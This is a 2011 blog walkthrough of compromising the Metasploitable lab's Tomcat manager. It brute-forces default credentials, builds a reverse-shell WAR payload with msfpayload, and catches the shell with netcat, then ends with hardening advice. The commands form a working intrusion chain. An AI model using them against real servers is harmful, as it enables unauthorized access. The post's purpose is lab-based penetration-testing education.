Wednesday, November 2, 2011

Attacking Metasploitable - tomcat, this is .War!

In this post we are going to target another attack vector of the metasploitable OS. In a previous post we did a port scan and saw that on port 8180 Apache Tomcat was running. For more info on what Apache Tomcat is, go here. Lets try to brute force the login credentials of the manager application for tomcat. We will use metasploit to do this.

msfconsole
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.2.109

Metasploit, by default, has some options configured that we will need to change. First we will need to change the port to 8180.

set RPORT 8180

We also want to change the STOP_ON_SUCCESS value to true so that when we are successful, metasploit will stop brute forcing.

set STOP_ON_SUCCESS true

Normally when brute forcing something, you need to provide a file or list of usernames and passwords, but since metasploit is one bad mo fo, it provides a user and password file custom made for this auxiliary module located at

/opt/framework/msf3/data/wordlists/tomcat_mgr_default_userpass.txt
/opt/framework/msf3/data/wordlists/tomcat_mgr_default_users.txt

If you have not explored the wordlist directory or any thing else inside metasploit, I would highly recommend you do so because there are many useful things you will find.

exploit


Perfect. The user configured a *highly complex username and password tomcat:tomcat. Now we can head over to the respective web address and try to login. We will open firefox and type this into our browser.

http://192.168.2.109:8180/manager/html


Once we are logged in, we are presented with the web application manager interface. We were able to compromise the web application, but now we are wanting to be able to interact with the underlying operating system. Since we only have application layer access right now, we need to find a way to get the application to run some code for us. If we scroll down we can see a place where the interface allows us to upload a .War file.



After doing some research, I found out that .war are Web ARchive files that contain all the files needed for a Java based web application. Would it be possible for us to somehow create a backdoor we could upload in the form of a .War file, and then get the backdoor to execute?

Metasploit to the rescue, once again. Using msfpayload, we can create shellcode and then specify what type of file to send it to. It just so happens, that one of the filetypes that msfpayload supports is .war. If you are not familiar with msfpayload there are plenty of tutorials out there. Google is your friend.

msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.2.102 LPORT=1337 W > runme.war


/* Sidenote: for some reason, the linux/x86/shell/reverse_tcp metasploit payload would work and create a session, but would then drop the session due to an EOFError that looks like this:

[*] Command shell session 2 opened (192.168.2.102:1337 -> 192.168.2.109:33743) at 2011-11-01 17:30:42 -0400
[*] Command shell session 2 closed. Reason: Died from EOFError

Not really sure why it does this, mabye has something to do with the /shell/reverse_tcp form of payload being the type where it just opens network connection then waits for the rest of the payload from the attacker machine, and the /shell_reverse_tcp type has the entire thing put together. I will have to keep playing around with it.*\

Ok, now that we have our backdoor in a .war format, all we need to do now is upload the file to the manager and then navigate to the right webpage to execute it on the machine. Metasploit actually implements the same technique as an exploit, but I wanted to try and do it manually so that I could learn more about how it works since I do not know a lot about java web applications. You can find more about their built-in exploit here:

http://www.metasploit.com/modules/exploit/multi/http/tomcat_mgr_deploy

After a little more research, I found out that msfpayload creates a randomly named .jsp (javaserver page) file and it puts the payload in this page. We will need to figure out what the page is called to access it. Since a WAR file is just an archive of other files, lets unzip the war file so we can see the name of the .jsp file. We can use the unzip command and the -l flag just to see a list of the files.

unzip -l runme.war


Perfect. Now we know the filename. Before we navigate to the page, we need to set up a listener on the attacker machine to catch the reverse shell. We can use either the multi/handler in metasploit or just a basic netcat listener. Lets just do netcat.

nc -v -l -p 1337

Once this is done, we need to navigate to the .jsp file on the server to get it to execute and hopefully give us a shell. The manager application will, by default, put the files located inside the WAR archive in a directory under the archive name. So in my case it will be /runme/ajegupbyv.jsp


Awesome! We now have OS layer access on this server. At this point we would do some recon and try to escalate privileges if we wanted to further compromise this machine.

What can we learn from this attack about securing tomcat?

1) Never, Never, Never, Never use the freakin name of the application as the username AND/OR the password. Ever. It is simply way to easy to brute force. A complex username and password is a must for authentication integrity. An unusual username and password would make brute forcing much harder.

2) If you are going to have a manager application, you can filter who is allowed to request it by IP or by host name. If the filter was by subnet, it would not have necessarily prevented this specific attack, due to the fact that I am on the same subnet as the server, but if the filter only allowed certain IP's to connect, it would have made the attackers job that much harder.

3) Although not a solid security tactic, rename the manager application. This would not stop an attacker but would at least make life a little tougher for him.

For more information on security an install of tomcat, OWASP has put together a pretty good article here:
https://www.owasp.org/index.php/Securing_tomcat#Securing_Manager_WebApp

3 comments:

  1. Just wanted to say thanks for the work on metasploitable attacks. I recently started learning msf for oscp and were very helpful!

    ReplyDelete
  2. I noticed that /usr/bin/ld does not function when using netcat to connect rather than tomcat_mgr_deploy.

    Local Privilege Escalation:

    gcc -o exploit exploit.c
    collect2: cannot find 'ld'

    whereis ld
    ld: /usr/bin/ld /usr/share/man/man1/ld.1.gz

    Any idea what to do? I tried to create only the object file with gcc and manually linking with ld, but no luck (perhaps I am just bad with ld's arguments).

    Of course I can do this with a precompiled executable instead, but after a wget you would not have +x permissions, but thankfully metasploitable allows tomcat55 (user) to use chmod.

    ReplyDelete
  3. how do we escalate to root? - seems like the final step is missing?

    ReplyDelete